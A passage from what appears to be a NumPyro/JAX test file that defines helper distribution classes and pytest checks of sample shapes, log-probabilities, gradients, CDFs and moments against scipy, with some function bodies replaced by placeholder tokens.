[vmap_over(d, loc=locs) for d in self.\n component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {'rate': constraints.positive, 'gate_logits':\n constraints.real}\n 
pytree_data_fields = 'rate',\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), gate_logits, validate_args=\n validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_zero_inflated_poisson_logits(self: ZeroInflatedPoissonLogits,\n rate=None, gate_logits=None):\n dist_axes = vmap_over.dispatch(dist.discrete.ZeroInflatedLogits)(self,\n base_dist=vmap_over(self.base_dist, rate=rate), gate_logits=\n gate_logits, gate=gate_logits)\n dist_axes.rate = rate\n return dist_axes\n\n\nclass SparsePoisson(dist.Poisson):\n\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: 'FoldedNormal', loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(self, base_dist=\n vmap_over(self.base_dist, loc=loc, scale=scale))\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = ['loc', 'correlation', 'conditional_precision']\n\n def __init__(self, loc, correlation, conditional_precision, adj_matrix,\n *, is_sparse=True, validate_args=None):\n super().__init__(loc, correlation, conditional_precision,\n adj_matrix, is_sparse=True, validate_args=validate_args)\n\n\n<mask token>\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\n<mask token>\n\n\ndef _is_batched_multivariate(jax_dist):\n return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\ndef gen_values_within_bounds(constraint, size, key=random.PRNGKey(11)):\n eps = 1e-06\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size)\n elif isinstance(constraint, constraints.greater_than):\n return jnp.exp(random.normal(key, size)) + constraint.lower_bound + eps\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.randint(key, size, lower_bound, upper_bound + 1)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound + random.poisson(key, np.array(5),\n shape=size)\n elif isinstance(constraint, constraints.interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=lower_bound, maxval=upper_bound\n )\n elif constraint in (constraints.real, constraints.real_vector):\n return random.normal(key, size)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1])\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(key, p=jnp.ones((n,)) / n, n=constraint.\n upper_bound, shape=size[:-1])\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(random.uniform(key, size[:-2] + (\n size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1))\n elif constraint is constraints.corr_matrix:\n cholesky = 
signed_stick_breaking_tril(random.uniform(key, size[:-2] +\n (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1))\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return jnp.tril(random.uniform(key, size))\n elif constraint is constraints.positive_definite:\n x = random.normal(key, size)\n return jnp.matmul(x, jnp.swapaxes(x, -2, -1))\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x - random.normal(key, size[:-1] + (1,))\n elif isinstance(constraint, constraints.independent):\n return gen_values_within_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n return x / jnp.linalg.norm(x, axis=-1)\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [0, (-1) ** sign * 0.5]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError('{} not implemented.'.format(constraint))\n\n\ndef gen_values_outside_bounds(constraint, size, key=random.PRNGKey(11)):\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size) - 2\n elif isinstance(constraint, constraints.greater_than):\n return constraint.lower_bound - jnp.exp(random.normal(key, size))\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n return random.randint(key, size, lower_bound - 1, lower_bound)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound - random.poisson(key, np.array(5),\n shape=size)\n elif isinstance(constraint, constraints.interval):\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=upper_bound, maxval=\n upper_bound + 1.0)\n elif constraint in [constraints.real, constraints.real_vector]:\n return lax.full(size, np.nan)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1]\n ) + 0.01\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(key, p=jnp.ones((n,)) / n, n=constraint.\n upper_bound, shape=size[:-1]) + 1\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(random.uniform(key, size[:-2] + (\n size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1)) + 0.01\n elif constraint is constraints.corr_matrix:\n cholesky = 0.01 + signed_stick_breaking_tril(random.uniform(key, \n size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1)\n )\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return random.uniform(key, size)\n elif constraint is constraints.positive_definite:\n return random.normal(key, size)\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x[..., ::-1]\n elif isinstance(constraint, constraints.independent):\n return gen_values_outside_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n x = x / jnp.linalg.norm(x, axis=-1, keepdims=True)\n return 2 * x\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [(-1) ** sign * 1.1, (-1) ** sign * 2]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError('{} not 
implemented.'.format(constraint))\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = (prepend_shape + jax_dist.batch_shape + jax_dist.\n event_shape)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if sp_dist and not _is_batched_multivariate(jax_dist) and not isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif sp_dist and not _is_batched_multivariate(jax_dist) and isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = 1 if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\n \"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.\n MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(jax_dist.precision_matrix, jnp.linalg.inv(jax_dist.\n covariance_matrix), rtol=1e-06)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, 'shape', ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n expected_batch_shape, expected_event_shape = type(jax_dist\n ).infer_shapes(*shapes)\n except NotImplementedError:\n pytest.skip(\n f'{type(jax_dist).__name__}.infer_shapes() is not implemented')\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(\n constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.\n reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n transf_dist.rsample(random.PRNGKey(0))\n\n\[email protected]('batch_shape', [(), (4,), (3, 2)])\ndef 
test_unit(batch_shape):\n log_factor = random.normal(random.PRNGKey(0), batch_shape)\n d = dist.Unit(log_factor=log_factor)\n x = d.sample(random.PRNGKey(1))\n assert x.shape == batch_shape + (0,)\n assert (d.log_prob(x) == log_factor).all()\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_sample_gradient(jax_dist, sp_dist, params):\n gamma_derived_params = {'Gamma': ['concentration'], 'Beta': [\n 'concentration1', 'concentration0'], 'BetaProportion': ['mean',\n 'concentration'], 'Chi2': ['df'], 'Dirichlet': ['concentration'],\n 'InverseGamma': ['concentration'], 'LKJ': ['concentration'],\n 'LKJCholesky': ['concentration'], 'StudentT': ['df']}.get(jax_dist.\n __name__, [])\n dist_args = [p for p in (inspect.getfullargspec(jax_dist.__init__)[0][1\n :] if inspect.isclass(jax_dist) else inspect.getfullargspec(\n jax_dist)[0])]\n params_dict = dict(zip(dist_args[:len(params)], params))\n jax_class = type(jax_dist(**params_dict))\n reparametrized_params = [p for p in jax_class.reparametrized_params if \n p not in gamma_derived_params]\n if not reparametrized_params:\n pytest.skip('{} not reparametrized.'.format(jax_class.__name__))\n nonrepara_params_dict = {k: v for k, v in params_dict.items() if k not in\n reparametrized_params}\n repara_params = tuple(v for k, v in params_dict.items() if k in\n reparametrized_params)\n rng_key = random.PRNGKey(0)\n\n def fn(args):\n args_dict = dict(zip(reparametrized_params, args))\n return jnp.sum(jax_dist(**args_dict, **nonrepara_params_dict).\n sample(key=rng_key))\n actual_grad = jax.grad(fn)(repara_params)\n assert len(actual_grad) == len(repara_params)\n eps = 0.001\n for i in range(len(repara_params)):\n if repara_params[i] is None:\n continue\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(\n repara_params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(\n repara_params)]\n fn_lhs = fn(args_lhs)\n fn_rhs = fn(args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])\n assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02,\n atol=0.03)\n\n\[email protected]('jax_dist, params', [(dist.Gamma, (1.0,)), (dist.\n Gamma, (0.1,)), (dist.Gamma, (10.0,)), (dist.Chi2, (1.0,)), (dist.Chi2,\n (0.1,)), (dist.Chi2, (10.0,)), (dist.Beta, (1.0, 1.0)), (dist.StudentT,\n (5.0, 2.0, 4.0))])\ndef test_pathwise_gradient(jax_dist, params):\n rng_key = random.PRNGKey(0)\n N = 1000000\n\n def f(params):\n z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))\n return (z + z ** 2).mean(0)\n\n def g(params):\n d = jax_dist(*params)\n return d.mean + d.variance + d.mean ** 2\n actual_grad = grad(f)(params)\n expected_grad = grad(g)(params)\n assert_allclose(actual_grad, expected_grad, rtol=0.005)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\[email protected]('jit', [False, True])\ndef test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):\n jit_fn = _identity if not jit else jax.jit\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert jax_dist.log_prob(samples\n ).shape == prepend_shape + jax_dist.batch_shape\n truncated_dists = (dist.LeftTruncatedDistribution, dist.\n RightTruncatedDistribution, dist.TwoSidedTruncatedDistribution)\n if sp_dist is None:\n if isinstance(jax_dist, truncated_dists):\n if isinstance(params[0], 
dist.Distribution):\n loc, scale, low, high = params[0].loc, params[0].scale, params[\n 1], params[2]\n else:\n loc, scale, low, high = params\n if low is None:\n low = -np.inf\n if high is None:\n high = np.inf\n sp_dist = get_sp_dist(type(jax_dist.base_dist))(loc, scale)\n expected = sp_dist.logpdf(samples) - jnp.log(sp_dist.cdf(high) -\n sp_dist.cdf(low))\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected,\n atol=1e-05)\n return\n pytest.skip('no corresponding scipy distn.')\n if _is_batched_multivariate(jax_dist):\n pytest.skip('batching not allowed in multivariate distns.')\n if jax_dist.event_shape and prepend_shape:\n pytest.skip(\n 'batched samples cannot be scored by multivariate distributions.')\n sp_dist = sp_dist(*params)\n try:\n expected = sp_dist.logpdf(samples)\n except AttributeError:\n expected = sp_dist.logpmf(samples)\n except ValueError as e:\n if \"The input vector 'x' must lie within the normal simplex.\" in str(e\n ):\n samples = jax.device_get(samples).astype('float64')\n samples = samples / samples.sum(axis=-1, keepdims=True)\n expected = sp_dist.logpdf(samples)\n else:\n raise e\n assert_allclose(jit_fn(jax_dist.log_prob)(samples), expected, atol=1e-05)\n\n\ndef test_mixture_log_prob():\n gmm = dist.MixtureSameFamily(dist.Categorical(logits=np.zeros(2)), dist\n .Normal(0, 1).expand([2]))\n actual = gmm.log_prob(0.0)\n expected = dist.Normal(0, 1).log_prob(0.0)\n assert_allclose(actual, expected)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + [T(dist.\n Poisson, 2.0), T(dist.Poisson, np.array([2.0, 3.0, 5.0]))])\[email protected]('ignore:overflow encountered:RuntimeWarning')\ndef test_cdf_and_icdf(jax_dist, sp_dist, params):\n d = jax_dist(*params)\n if d.event_dim > 0:\n pytest.skip(\n 'skip testing cdf/icdf methods of multivariate distributions')\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 0.002 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-05\n if d.shape() == () and not d.is_discrete:\n assert_allclose(jax.vmap(jax.grad(d.cdf))(samples), jnp.exp(d.\n log_prob(samples)), atol=1e-05, rtol=rtol)\n assert_allclose(jax.vmap(jax.grad(d.icdf))(quantiles), jnp.exp(\n -d.log_prob(d.icdf(quantiles))), atol=1e-05, rtol=rtol)\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-05,\n rtol=1e-05)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-05, rtol=rtol)\n except NotImplementedError:\n pass\n if not sp_dist:\n pytest.skip('no corresponding scipy distn.')\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-05, rtol=1e-05)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=0.0001, rtol=0.0001)\n except NotImplementedError:\n pass\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DIRECTIONAL)\ndef test_gof(jax_dist, sp_dist, params):\n if 'Improper' in jax_dist.__name__:\n pytest.skip('distribution has improper .log_prob()')\n if 'LKJ' in jax_dist.__name__:\n pytest.xfail('incorrect submanifold scaling')\n if jax_dist is dist.EulerMaruyama:\n d = jax_dist(*params)\n if d.event_dim > 1:\n pytest.skip(\n 'EulerMaruyama skip test when event shape is non-trivial.')\n num_samples = 10000\n if 'BetaProportion' in jax_dist.__name__:\n num_samples = 20000\n rng_key = random.PRNGKey(0)\n d = jax_dist(*params)\n samples = 
d.sample(key=rng_key, sample_shape=(num_samples,))\n probs = np.exp(d.log_prob(samples))\n dim = None\n if jax_dist is dist.ProjectedNormal:\n dim = samples.shape[-1] - 1\n probs = probs.reshape(num_samples, -1)\n samples = samples.reshape(probs.shape + d.event_shape)\n if 'Dirichlet' in jax_dist.__name__:\n samples = samples[..., :-1]\n for b in range(probs.shape[1]):\n try:\n gof = auto_goodness_of_fit(samples[:, b], probs[:, b], dim=dim)\n except InvalidTest:\n pytest.skip('expensive test')\n else:\n assert gof > TEST_FAILURE_RATE\n\n\n<mask token>\n\n\ndef _tril_cholesky_to_tril_corr(x):\n w = vec_to_tril_matrix(x, diagonal=-1)\n diag = jnp.sqrt(1 - jnp.sum(w ** 2, axis=-1))\n cholesky = w + jnp.expand_dims(diag, axis=-1) * jnp.identity(w.shape[-1])\n corr = jnp.matmul(cholesky, cholesky.T)\n return matrix_to_tril_vec(corr, diagonal=-1)\n\n\[email protected]('dimension', [2, 3, 5])\ndef test_log_prob_LKJCholesky_uniform(dimension):\n d = dist.LKJCholesky(dimension=dimension, concentration=1)\n N = 5\n corr_log_prob = []\n for i in range(N):\n sample = d.sample(random.PRNGKey(i))\n log_prob = d.log_prob(sample)\n sample_tril = matrix_to_tril_vec(sample, diagonal=-1)\n cholesky_to_corr_jac = np.linalg.slogdet(jax.jacobian(\n _tril_cholesky_to_tril_corr)(sample_tril))[1]\n corr_log_prob.append(log_prob - cholesky_to_corr_jac)\n corr_log_prob = np.array(corr_log_prob)\n assert_allclose(corr_log_prob, jnp.broadcast_to(corr_log_prob[0],\n corr_log_prob.shape), rtol=1e-06)\n if dimension == 2:\n assert_allclose(corr_log_prob[0], jnp.log(0.5), rtol=1e-06)\n\n\[email protected]('dimension', [2, 3, 5])\[email protected]('concentration', [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n d = dist.LKJCholesky(dimension, concentration, sample_method='cvine')\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(\n partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky\n ).log_abs_det_jacobian(unconstrained, sample)\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = (beta_log_prob - affine_logdet -\n signed_stick_breaking_logdet)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-05)\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-06\n )\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(0, 20, (1000, 100))\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n num_samples = 
100000\n probs = np.random.beta(concentration1, concentration0, size=(\n num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.BetaBinomial(concentration1, concentration0, total_count\n ).log_prob(value)\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('batch_shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = 3,\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n value = total_count * jnp.eye(event_shape[-1]).reshape(event_shape + (1\n ,) * len(batch_shape) + event_shape)\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (\n num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(\n value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n num_samples = 300000\n poisson_rate = np.random.gamma(gamma_conc, 1 / gamma_rate, size=(\n num_samples,) + shape)\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip('we have separated tests for LKJCholesky distribution')\n if jax_dist is _ImproperWrapper:\n pytest.skip(\n 'no param for ImproperUniform to test for log_prob gradient')\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n eps = 0.001\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n continue\n if jax_dist is _SparseCAR and i == 3:\n continue\n if isinstance(params[i], dist.Distribution):\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32,\n jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01,\n atol=0.01)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_mean_var(jax_dist, sp_dist, params):\n if jax_dist is _ImproperWrapper:\n pytest.skip('Improper distribution does not has mean/var implemented')\n if jax_dist is FoldedNormal:\n pytest.skip('Folded distribution does not has mean/var implemented')\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\n 'EulerMaruyama distribution does not has mean/var implemented')\n if jax_dist is dist.RelaxedBernoulliLogits:\n pytest.skip(\n 'RelaxedBernoulli 
distribution does not has mean/var implemented')\n if 'SineSkewed' in jax_dist.__name__:\n pytest.skip('Skewed Distribution are not symmetric about location.')\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, dist.\n LeftTruncatedDistribution, dist.RightTruncatedDistribution, dist.\n TwoSidedTruncatedDistribution):\n pytest.skip('Truncated distributions do not has mean/var implemented')\n if jax_dist is dist.ProjectedNormal:\n pytest.skip('Mean is defined in submanifold')\n n = 20000 if jax_dist in [dist.LKJ, dist.LKJCholesky, dist.\n SineBivariateVonMises] else 200000\n d_jax = jax_dist(*params)\n k = random.PRNGKey(0)\n samples = d_jax.sample(k, sample_shape=(n,)).astype(np.float32)\n if sp_dist and not _is_batched_multivariate(d_jax) and jax_dist not in [\n dist.VonMises, dist.MultivariateStudentT, dist.MatrixNormal]:\n d_sp = sp_dist(*params)\n try:\n sp_mean = d_sp.mean()\n except TypeError:\n sp_mean = d_sp.mean\n if d_jax.event_shape:\n try:\n sp_var = jnp.diag(d_sp.cov())\n except TypeError:\n sp_var = jnp.diag(d_sp.cov)\n except AttributeError:\n sp_var = d_sp.var()\n else:\n sp_var = d_sp.var()\n assert_allclose(d_jax.mean, sp_mean, rtol=0.01, atol=1e-07)\n assert_allclose(d_jax.variance, sp_var, rtol=0.01, atol=1e-07)\n if jnp.all(jnp.isfinite(sp_mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05,\n atol=0.01)\n if jnp.all(jnp.isfinite(sp_var)):\n assert_allclose(jnp.std(samples, 0), jnp.sqrt(d_jax.variance),\n rtol=0.05, atol=0.01)\n elif jax_dist in [dist.LKJ, dist.LKJCholesky]:\n if jax_dist is dist.LKJCholesky:\n corr_samples = jnp.matmul(samples, jnp.swapaxes(samples, -2, -1))\n else:\n corr_samples = samples\n dimension, concentration, _ = params\n marginal = dist.Beta(concentration + 0.5 * (dimension - 2), \n concentration + 0.5 * (dimension - 2))\n marginal_mean = 2 * marginal.mean - 1\n marginal_std = 2 * jnp.sqrt(marginal.variance)\n expected_mean = jnp.broadcast_to(jnp.reshape(marginal_mean, jnp.\n shape(marginal_mean) + (1, 1)), jnp.shape(marginal_mean) +\n d_jax.event_shape)\n expected_std = jnp.broadcast_to(jnp.reshape(marginal_std, jnp.shape\n (marginal_std) + (1, 1)), jnp.shape(marginal_std) + d_jax.\n event_shape)\n expected_mean = expected_mean * (1 - jnp.identity(dimension)\n ) + jnp.identity(dimension)\n expected_std = expected_std * (1 - jnp.identity(dimension))\n assert_allclose(jnp.mean(corr_samples, axis=0), expected_mean, atol\n =0.01)\n assert_allclose(jnp.std(corr_samples, axis=0), expected_std, atol=0.01)\n elif jax_dist in [dist.VonMises]:\n assert_allclose(d_jax.mean, jnp.mean(samples, 0), rtol=0.05, atol=0.01)\n x, y = jnp.mean(jnp.cos(samples), 0), jnp.mean(jnp.sin(samples), 0)\n expected_variance = 1 - jnp.sqrt(x ** 2 + y ** 2)\n assert_allclose(d_jax.variance, expected_variance, rtol=0.05, atol=0.01\n )\n elif jax_dist in [dist.SineBivariateVonMises]:\n phi_loc = _circ_mean(samples[..., 0])\n psi_loc = _circ_mean(samples[..., 1])\n assert_allclose(d_jax.mean, jnp.stack((phi_loc, psi_loc), axis=-1),\n rtol=0.05, atol=0.01)\n elif jax_dist in [dist.MatrixNormal]:\n sample_shape = 200000,\n if len(d_jax.batch_shape) > 0:\n axes = [(len(sample_shape) + i) for i in range(len(d_jax.\n batch_shape))]\n axes = tuple(axes)\n samples_re = jnp.moveaxis(samples, axes, jnp.arange(len(axes)))\n subshape = samples_re.shape[:len(axes)]\n ixi = product(*[range(k) for k in subshape])\n for ix in ixi:\n\n def get_min_shape(ix, batch_shape):\n return min(ix, tuple(map(lambda x: x - 1, batch_shape)))\n ix_loc = get_min_shape(ix, 
